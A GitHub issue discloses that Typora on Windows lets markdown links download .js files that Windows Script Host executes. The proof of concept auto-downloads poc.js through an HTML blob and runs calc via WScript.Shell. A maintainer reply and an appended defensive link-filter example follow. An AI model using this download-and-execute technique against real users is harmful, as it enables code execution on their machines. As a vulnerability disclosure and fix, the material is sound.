Typora on Windows fails to properly filter WSH JScript, which may result in code execution #5623

Closed
liyansong2018 opened this issue Feb 9, 2023 · 2 comments

liyansong2018 commented Feb 9, 2023

Description

Although Typora filters most dangerous suffixes, it still retains the .js file, which will be recognized as WSH (Windows Script Host) JScript on the Windows operating system. A user clicking on an evil markdown file may cause code execution.

Version: 0.9.78-1.5.5(latest)

demo

Attachment

poc.md

poc.html

<!-- auto download !-->
<html>
<script>
    var blob = new Blob(['var WshShell = new ActiveXObject("WScript.Shell");var ret = WshShell.run("calc");if (ret == 0)WScript.Echo("You were hacked.");WScript.Quit();'],{type:'application/js'});
    var a = document.createElement('a');
    a.href = window.URL.createObjectURL(blob);
    a.download =  'poc.js';
    a.click();
</script>
</html>

<!-- click to download !-->
<a href="http://127.0.0.1:8000/poc.js" download="poc.js">CLICK~~</a>

poc.js

var WshShell = new ActiveXObject("WScript.Shell");
var ret = WshShell.run("calc");
if (ret == 0)
    WScript.Echo("You were hacked.")
WScript.Quit();

abnerlee commented Feb 14, 2023

If you set WSH as the default application for .js files, then when you click poc.js in File Explorer, the script will also be executed. Actually, users should not set WSH as the default application for .js files.

@abnerlee

improved in 1.5.8
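
An added example, not Typora's code and not written by either participant in this thread: a link filter that blocks the Windows Script Host file types, checking both the link target and the `download` name after normalizing them the way Windows would. The extension list and the names `WSH_EXTENSIONS`, `effectiveExtension` and `isBlockedLink` are assumptions made for illustration.

```javascript
// Added example (assumed names and list); not taken from Typora.
// File types that Windows can hand to Windows Script Host (wscript.exe / cscript.exe).
const WSH_EXTENSIONS = new Set(['js', 'jse', 'vbs', 'vbe', 'wsf', 'wsh']);

// Reduce a link target or `download` attribute value to the extension
// Windows would use when the saved file is opened.
function effectiveExtension(name) {
  let s = String(name);
  // Drop the URL query and fragment before decoding, so an encoded "?" stays in the name.
  s = s.split(/[?#]/)[0];
  try { s = decodeURIComponent(s); } catch (e) { /* malformed escape: keep the raw text */ }
  // Keep only the last path segment (either slash style).
  s = s.split(/[\\/]/).pop();
  // Win32 strips trailing dots and spaces: "poc.js. " is stored as "poc.js".
  s = s.replace(/[. ]+$/, '');
  const dot = s.lastIndexOf('.');
  return dot === -1 ? '' : s.slice(dot + 1).toLowerCase();
}

// Block the link if either the href or the download name resolves to a WSH
// script type; the download attribute decides the saved file name, so a
// blob: URL with download="poc.js" must be caught through that attribute.
function isBlockedLink(href, downloadName) {
  const candidates = [href];
  if (downloadName !== undefined && downloadName !== null) candidates.push(downloadName);
  return candidates.some((c) => WSH_EXTENSIONS.has(effectiveExtension(c)));
}

// Constructed sample links; the first two mirror the link shapes in this issue.
const samples = [
  ['http://127.0.0.1:8000/poc.js', 'poc.js'],
  ['blob:null/0f3a9c1e', 'poc.js'],
  ['https://example.com/files/POC.JS. ', undefined],
  ['https://example.com/poc%2Evbs?x=1', undefined],
  ['https://example.com/notes.md', undefined],
];
for (const [href, download] of samples) {
  console.log(isBlockedLink(href, download) ? 'BLOCK' : 'allow', href, download || '');
}
```

A denylist like this only covers the types it names; an allowlist of document and image types is the stricter form of the same check.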
